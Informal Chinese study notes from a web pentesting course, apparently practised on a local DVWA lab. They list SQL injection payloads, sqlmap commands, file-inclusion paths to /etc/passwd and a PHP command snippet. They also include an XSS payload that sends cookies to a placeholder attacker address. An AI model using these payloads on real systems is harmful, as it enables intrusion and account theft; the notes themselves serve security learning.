没有兴趣,何来成就,难道就只是为了咕噜猫?hahaha(听不懂吧,没关系,只是因为加密了,你能从我的笔记中找到答案么嘿嘿嘿嘿!!!)
注意:以下内容仅记录本人当时学习时任然不知的相关知识。笔记草率,可能有错,仅供参考。我会慢慢完善的哦!
写在前面:
1.业界比较好的信息安全网站:
freebuff:这个看来你已经找到了
secWiKi:ennnnn
安全客:收集了各大SRC哦,如果你哪一天灵感大发发现一个漏洞或者业务逻辑Bug,赶快去提交吧,也可以去补天,漏洞盒子提交哦!还有众测平台哈哈哈。还有,前段时间发现美团外卖安卓app有时候在下单选地址页面可以看到别人的隐私信息哦,可能就是个bug吧hahahaha
看雪:主要为移动安全
你要是问我这些哪里来的,我只能说华为的安全工程师天天在上这些网站,哈哈哈
2.如果我笔记当中看到自己不知道的业界名词或者知识,马上去百度一下哦!
基本完整渗透测试框架图:
以下是跟着四个导师学习实践的学习笔记哦,可能有些只有我自己懂,但我会慢慢完善的呢,导师我就不介绍了,做安全的对这些很敏感的呀,所以除了知识就不要相信我的话,会迷糊你的,这些叫什么,social engineering哈哈哈,导师都是企业实践五六年的老行家了,等保测评师呀,渗透测试高级工程师呀等等等的。
Day1:谈心培养兴趣
Day 2:
Chmod
Mv 修改文件名
http请求包含:
请求行
请求头
请求正文
Get请求没有请求正文
GET vs POST
1.请求参数
-get
501 方法未实现
3xx 重定向
Sql 注入:
1.判断 '或者"
2.注释:# 或者 - -
联合查询:
1.Order by
2.union select 1,2
3.库 database()
4.表 information_schema.tables
5.列 union select column_name,2 from information_schema.columns where table_schema=database() and able_name='users'#
6.内容 union select user,password from users#
And ascii(mid((select user from user 0,1),1,1))>96
布尔注入(暴力注入):
And 1=1
And 1=2
库
表 exists(select * from users)
列 exists(select 列名 from users)
内容 and select user from users limit 1,2 / select mid("hello word",2,1)从第二个开始取一个
0-9: 48 0x30
a-z: 97 0x61 select ascii('A')
select ascii('A')
A-Z 65 0x65
URL编码:%号开头 ,%20就是空格
Sleep()延时用法 Select if(exist(select * frrom user),sleep(5),3)
作业:hub.docker.com
3,5,9题
Docker pull
Docker run
Day3:
comcat(“hell”,"word!")拼接
Select ord(':') 查看accii
Hex(68) 查十六进制
Group_concat(username,0x3a,password)一行显示
-报错注入:
-floor |
Select floor((rand(0)*2) |
|
Rand(0)随机数 |
-updatexml(1,comcat(0x7e,version(),0x7e),3) version()可以替换成sql语句
-extractvalue 同理上
-二阶注入:
-insert into users claus('admin','pwd')
-update usersset pwd='123' where name='name'
-万能密码
-文件读写
-前提:
-File
-my.cnf/my.ini
-secure_file_priv=''
-读文件
-load_file ('path')绝对路径
Etc/passwd存放用户信息
-写文件
-into outfile 'path'
-into dumpfile 'path'
-绕过技术
-替换or=|| and =&&
-大小写
-双写 对抗这个可以用循环持续过滤,直到没有
-内联注释
-空格 %20+ --- 、))、 %a0 %0b --=ss %2b
-注释 # +--+ ----> 闭合 就是将后面的也闭合
-POST
-sqlmap
-基本使用
1.判断 |
Sqlmap -u "url" |
2.库 |
sqlmap -u "url" --dbs /--current-db |
3.表 |
sqlmap -u "url" -D db --tables |
4.列 |
sqlmap -u "url" -D db -T tb --columns |
5.内容 |
sqlmap -u "url" -D db -T tb -C col --dump |
对于post类型 |
Sqlmap -r 1.txt |
|
Sqlmap -r 1.txt -vv -D security --v显示详细信息,包括输入了什么内容 |
|
|
-写tamper
DAY 4
-命令执行
-多条命令符号
;
||(或者)前面为假的时候后面才可以执行
|
&& 一个&
后台运行
Wget
Echo
-文件包含
-#include<stdio.h>
-PHP include() require()
Config.inc.php --db
例子:http://localhost:8001/vulnerabilities/fi/?page=../../../../../etc/passwd
-LFI
-无论后缀名是什么,只要里面有php代码,都会被执行
-php伪协议
-php://filter/read=convert.base64-encode/resource=1.php
<?php
System('whoami')
?>
-RFI
-http://localhost:8001/vulnerabilities/fi/?page=http://192.168.38.1/1.txt远程文件包含
-
-XSS(html注入)
-js语句
-document.cookie获取cookie
-存储型
<script>document.location='http://你的地址'+document.cookie</script>
<script>
document.write("img src='http://"+document.cookie+"'/>");
</script>
-文件上传(抓包,发送reper,修改后缀)
-一句话